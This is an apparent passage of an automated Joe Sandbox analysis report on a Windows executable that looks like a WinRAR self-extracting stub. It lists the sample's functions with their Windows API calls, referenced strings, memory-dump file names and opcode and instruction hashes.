Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
String ID: PNG
API String ID: 3656887471-364855578
Opcode ID: 4cac0da92e638e12491dee299488a45f28bf608d5129b78be1cf360b9cc5874e
Instruction ID: e38516d14ccfcf4859d19e6b85241059aab8a2401a7439a93f3735577f2ef92b
Opcode Fuzzy Hash: 4cac0da92e638e12491dee299488a45f28bf608d5129b78be1cf360b9cc5874e
Instruction Fuzzy Hash: B1315271604306ABDB11AF61DC49A2BBBE9FF86751B084569F906E3270DF71E800CB61

Function 00B7A5F4 Relevance: 7.6, APIs: 5, Instructions: 107
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00B7A4EF,000000FF,?,?), ref: 00B7A628
FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00B7A4EF,000000FF,?,?), ref: 00B7A65E
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00B7A4EF,000000FF,?,?), ref: 00B7A66A
FindNextFileW.KERNEL32(?,?,?,?,?,?,00B7A4EF,000000FF,?,?), ref: 00B7A692
GetLastError.KERNEL32(?,?,?,?,00B7A4EF,000000FF,?,?), ref: 00B7A69E

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: d8c3c1514a413b245fc54ce4ace9aa505feab16fb5a3c091ed6f452a1e5633c5
Instruction ID: ac3e564001c2510fe1d9054a5a306355c56484991809ee011b2b3bde9658ecde
Opcode Fuzzy Hash: d8c3c1514a413b245fc54ce4ace9aa505feab16fb5a3c091ed6f452a1e5633c5
Instruction Fuzzy Hash: DB418F72504241AFC364EF68C884ADEF7E8FF89340F044A6AF5ADD3250D774A9588B92

Function 00B9753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,00B97513,00000000,00BABAD8,0000000C,00B9766A,00000000,00000002,00000000), ref: 00B9755E
TerminateProcess.KERNEL32(00000000,?,00B97513,00000000,00BABAD8,0000000C,00B9766A,00000000,00000002,00000000), ref: 00B97565
ExitProcess.KERNEL32 ref: 00B97577

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 170c602c4554748115b2fc549bf5bed39ad32592846c23e40956cfb50aea85f4
Instruction ID: 4b7d109d5c0747ae54d2c2466c2292a7f13cf98a07c77e74509e06191f7869bc
Opcode Fuzzy Hash: 170c602c4554748115b2fc549bf5bed39ad32592846c23e40956cfb50aea85f4
Instruction Fuzzy Hash: 40E04631020908ABCF21AF24CD0AA483BE9EB12B41F018064F8058B222CF35DE42CB80

Function 00B7857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B78580
_memcmp.LIBVCRUNTIME ref: 00B78A08

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: H_prolog_memcmp
String ID:
API String ID: 3004599000-0
Opcode ID: d9974198ef658a4047af277bd1056b77f79d8e44c08b9822ccc392af9851dacd
Instruction ID: af3f8cb52a01d9cebca0163a6277ead41c366447833e7b5b4e188ec2a29235e4
Opcode Fuzzy Hash: d9974198ef658a4047af277bd1056b77f79d8e44c08b9822ccc392af9851dacd
Instruction Fuzzy Hash: 0D82F971944245AEDF25DB64C889BFABBF9EF05300F08C5F9E86DAB142DB315A44CB60

Function 00B8AEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B8AEE5

Part of subcall function 00B7130B: GetDlgItem.USER32(00000000,00003021), ref: 00B7134F
Part of subcall function 00B7130B: SetWindowTextW.USER32(00000000,00BA35B4), ref: 00B71365

Strings

<, xrefs: 00B8B29A
STARTDLG, xrefs: 00B8AF04
__tmp_rar_sfx_access_check_%u, xrefs: 00B8B1CB
winrarsfxmappingfile.tmp, xrefs: 00B8B2BC
@, xrefs: 00B8B2A7
"%s"%s, xrefs: 00B8B423
C:\Users\user\Desktop, xrefs: 00B8B2DF
LICENSEDLG, xrefs: 00B8B771
-el -s2 "-d%s" "-sp%s", xrefs: 00B8B281

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: H_prologItemTextWindow
String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 810644672-8108337
Opcode ID: 568db0661a8b2cd43bb22620d95bc2a57f79ca71c2e05d92dbfa883551211f34
Instruction ID: 9f1f1ee09e4a8b9095b0dad44fa978cd0e10e11f90a925d947d46b96d4b04681
Opcode Fuzzy Hash: 568db0661a8b2cd43bb22620d95bc2a57f79ca71c2e05d92dbfa883551211f34
Instruction Fuzzy Hash: 8A42BF71944245ABEB21BBB09C9AFBE7BFCEB15700F0041D6F605A71A1DFB45944CB21

Function 00B800CF Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 317
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 00B800E4
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B800F6
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B80127
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B803D4
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B803F0
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B80402
ReadFile.KERNEL32(00000000,?,00007FFE,00BA3BA4,00000000), ref: 00B80421
CloseHandle.KERNEL32(00000000), ref: 00B80479
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B8048F
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00B804E7
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00B80510
GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00B8054A

Part of subcall function 00B80085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B800A0
Part of subcall function 00B80085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B7EB86,Crypt32.dll,00000000,00B7EC0A,?,?,00B7EBEC,?,?,?), ref: 00B800C2

_swprintf.LIBCMT ref: 00B805BE
_swprintf.LIBCMT ref: 00B8060A

Part of subcall function 00B7400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B7401D

AllocConsole.KERNEL32 ref: 00B80612
GetCurrentProcessId.KERNEL32 ref: 00B8061C
AttachConsole.KERNEL32(00000000), ref: 00B80623
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00B80649
WriteConsoleW.KERNEL32(00000000), ref: 00B80650
Sleep.KERNEL32(00002710), ref: 00B8065B
FreeConsole.KERNEL32 ref: 00B80661
ExitProcess.KERNEL32 ref: 00B80669

Strings

Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00B805F8
uxtheme.dll, xrefs: 00B8058B
kernel32, xrefs: 00B800DD
SetDllDirectoryW, xrefs: 00B800F0
dwmapi.dll, xrefs: 00B80194, 00B80581
DXGIDebug.dll, xrefs: 00B80169, 00B804D3
SetDefaultDllDirectories, xrefs: 00B80121

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1201351596-3298887752
Opcode ID: c2468eb87fec86807783c8239b71708a1157d5990ac29013aa1ac44a3b051b95
Instruction ID: 26fe81a4ff72c371b2376dade6538f83a1aed36e72a4de499d576d8c5995a271
Opcode Fuzzy Hash: c2468eb87fec86807783c8239b71708a1157d5990ac29013aa1ac44a3b051b95
Instruction Fuzzy Hash: 0DD185B215C384ABD370AF50D849B9FBAE8EF86B44F00499DF59997150DBB08648CB62

Function 00B8BDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00B8BDFA

Part of subcall function 00B8AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00B8AAFE

SetWindowTextW.USER32(?,?), ref: 00B8C127
_wcsrchr.LIBVCRUNTIME ref: 00B8C2B1
GetDlgItem.USER32(?,00000066), ref: 00B8C2EC
SetWindowTextW.USER32(00000000,?), ref: 00B8C2FC
SendMessageW.USER32(00000000,00000143,00000000,00BBA472), ref: 00B8C30A
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B8C335

Strings

<br>, xrefs: 00B8C08A
ProgramFilesDir, xrefs: 00B8C1FB
Software\Microsoft\Windows\CurrentVersion, xrefs: 00B8C1D0
%s.%d.tmp, xrefs: 00B8BFF6

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 3564274579-312220925
Opcode ID: 2b84935cbbbb9ee4e45587b608ad759819dab9e50446bd1dc9227bb5547b2cb9
Instruction ID: 2d633d395c1a2002a0127b6f8ae593e6a8ace657d0072e9cdfcdf152cb9a9b26
Opcode Fuzzy Hash: 2b84935cbbbb9ee4e45587b608ad759819dab9e50446bd1dc9227bb5547b2cb9
Instruction Fuzzy Hash: A1E140B6D04119AADB25EBA0DC85EEB77FCEF19751F0040E6F509E3061EB749A84CB60

Function 00B7D341 Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 555
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00B7D346
_wcschr.LIBVCRUNTIME ref: 00B7D367
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00B7D328,?), ref: 00B7D382
__fprintf_l.LIBCMT ref: 00B7D873

Part of subcall function 00B8137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00B7B652,00000000,?,?,?,0001040E), ref: 00B81396

Strings

@%s:, xrefs: 00B7D85D, 00B7D869
, xrefs: 00B7D67A
*messages***, xrefs: 00B7D4D3
,, xrefs: 00B7D8AE
RTL, xrefs: 00B7D838
a, xrefs: 00B7D4EF
*messages***, xrefs: 00B7D49A
R, xrefs: 00B7D4E5
$%s:, xrefs: 00B7D856

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 4184910265-980926923
Opcode ID: 7becf37f10d424b7b1880b626789f571b71a211e44a2992a77e732bf1b891ee2
Instruction ID: 6c440e45c07777edeff40d0e2c053f2361ec183f1e5f46bc7a555b56755f7c1e
Opcode Fuzzy Hash: 7becf37f10d424b7b1880b626789f571b71a211e44a2992a77e732bf1b891ee2
Instruction Fuzzy Hash: B712A1719002199ADF24EFA4DC81AEEB7F5EF14740F1085E9F52AB7291EB709E44CB24

Function 00B8CB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B8AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B8AC85
Part of subcall function 00B8AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B8AC96
Part of subcall function 00B8AC74: IsDialogMessageW.USER32(0001040E,?), ref: 00B8ACAA
Part of subcall function 00B8AC74: TranslateMessage.USER32(?), ref: 00B8ACB8
Part of subcall function 00B8AC74: DispatchMessageW.USER32(?), ref: 00B8ACC2

GetDlgItem.USER32(00000068,00BCECB0), ref: 00B8CB6E
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,00B8A632,00000001,?,?,00B8AECB,00BA4F88,00BCECB0), ref: 00B8CB96
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B8CBA1
SendMessageW.USER32(00000000,000000C2,00000000,00BA35B4), ref: 00B8CBAF
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B8CBC5
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00B8CBDF
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B8CC23
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00B8CC31
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B8CC40
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B8CC67
SendMessageW.USER32(00000000,000000C2,00000000,00BA431C), ref: 00B8CC76

Strings

\, xrefs: 00B8CBCF

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 967610537a7b6c559f42e3ee36458d81f4df7a690fa58251c9f6c7f8bf8db45e
Instruction ID: 04c7861696bd328f22e384ec77459dc9f76b052e5495ac7929f195cec4e31ef0
Opcode Fuzzy Hash: 967610537a7b6c559f42e3ee36458d81f4df7a690fa58251c9f6c7f8bf8db45e
Instruction Fuzzy Hash: AE31D371146781AFE301DF20DC5AFABBFACEB92704F00050AF651972A1EF645904CBB6

Function 00B8CE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32(?), ref: 00B8CF54
ShowWindow.USER32(?,00000000), ref: 00B8CF93
GetExitCodeProcess.KERNEL32(?,?), ref: 00B8CFCF
CloseHandle.KERNEL32(?), ref: 00B8CFF5
ShowWindow.USER32(?,00000001), ref: 00B8D084

Part of subcall function 00B817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00B7BB05,00000000,.exe,?,?,00000800,?,?,00B885DF,?), ref: 00B817C2

Strings

, xrefs: 00B8CEA2
.exe, xrefs: 00B8CFFF
.inf, xrefs: 00B8CF10

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
String ID: $.exe$.inf
API String ID: 3686203788-2452507128
Opcode ID: 4d70d1f55625ae8cbb6fe292810f62dda8ce2be0f5245ffd228ab12f33b188e4
Instruction ID: 7790231d63e5a8c85dd34f44686dfd4996c08ef3d598df9648897ed9f4417628
Opcode Fuzzy Hash: 4d70d1f55625ae8cbb6fe292810f62dda8ce2be0f5245ffd228ab12f33b188e4
Instruction Fuzzy Hash: 3361D6B15043809AE731BF24D810AABBBE5EF85304F04489EF5D5972B1DBB1D989CB61

Function 00B9A058 Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00B94E35,00B94E35,?,?,?,00B9A2A9,00000001,00000001,3FE85006), ref: 00B9A0B2
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00B9A2A9,00000001,00000001,3FE85006,?,?,?), ref: 00B9A138
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00B9A232
__freea.LIBCMT ref: 00B9A23F

Part of subcall function 00B98518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B9C13D,00000000,?,00B967E2,?,00000008,?,00B989AD,?,?,?), ref: 00B9854A

__freea.LIBCMT ref: 00B9A248
__freea.LIBCMT ref: 00B9A26D

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 9c565221a6a80b1a0316ead1816bb374dd82fc7e571ec77e99e8b66368251fee
Instruction ID: 2240758a48ee6e0eaa675085f8f362271a8f710be03ef12cadc8bb942252bdf2
Opcode Fuzzy Hash: 9c565221a6a80b1a0316ead1816bb374dd82fc7e571ec77e99e8b66368251fee
Instruction Fuzzy Hash: 9751BE72610216AFEF259F64CC82EBB77EAEB41750F1546B9FC14E6180EB35DC4086E2

Function 00B8A335 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B80085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B800A0
Part of subcall function 00B80085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B7EB86,Crypt32.dll,00000000,00B7EC0A,?,?,00B7EBEC,?,?,?), ref: 00B800C2

OleInitialize.OLE32(00000000), ref: 00B8A34E
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B8A385
SHGetMalloc.SHELL32(00BB8430), ref: 00B8A38F

Strings

3Ro, xrefs: 00B8A366
riched20.dll, xrefs: 00B8A33D

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3Ro
API String ID: 3498096277-3613677438
Opcode ID: 10465e7fa090dcf02e10865287de666d86aaf6daa93c1a9c0f5dd1934878be4d
Instruction ID: c3646ddaaee5c66285f3ee8c43b1ef82b949af3e784ba6fd530005735d98e33b
Opcode Fuzzy Hash: 10465e7fa090dcf02e10865287de666d86aaf6daa93c1a9c0f5dd1934878be4d
Instruction Fuzzy Hash: 90F0E7B1D01209ABCB10AF99D8499EFFBFCEB95701F0041AAE954A2211DBB45605CBA1

Function 00B799B0 Relevance: 7.6, APIs: 5, Instructions: 117
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00B778AD,?,00000005,?,00000011), ref: 00B79A4C
GetLastError.KERNEL32(?,?,00B778AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B79A59
CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00B778AD,?,00000005,?), ref: 00B79A8E
GetLastError.KERNEL32(?,?,00B778AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B79A96
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00B778AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B79ADB

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 7399b38aff369f9d13fb846c6dbddc85301b6d9ff1c45b3086e6f11bbdbe2b2a
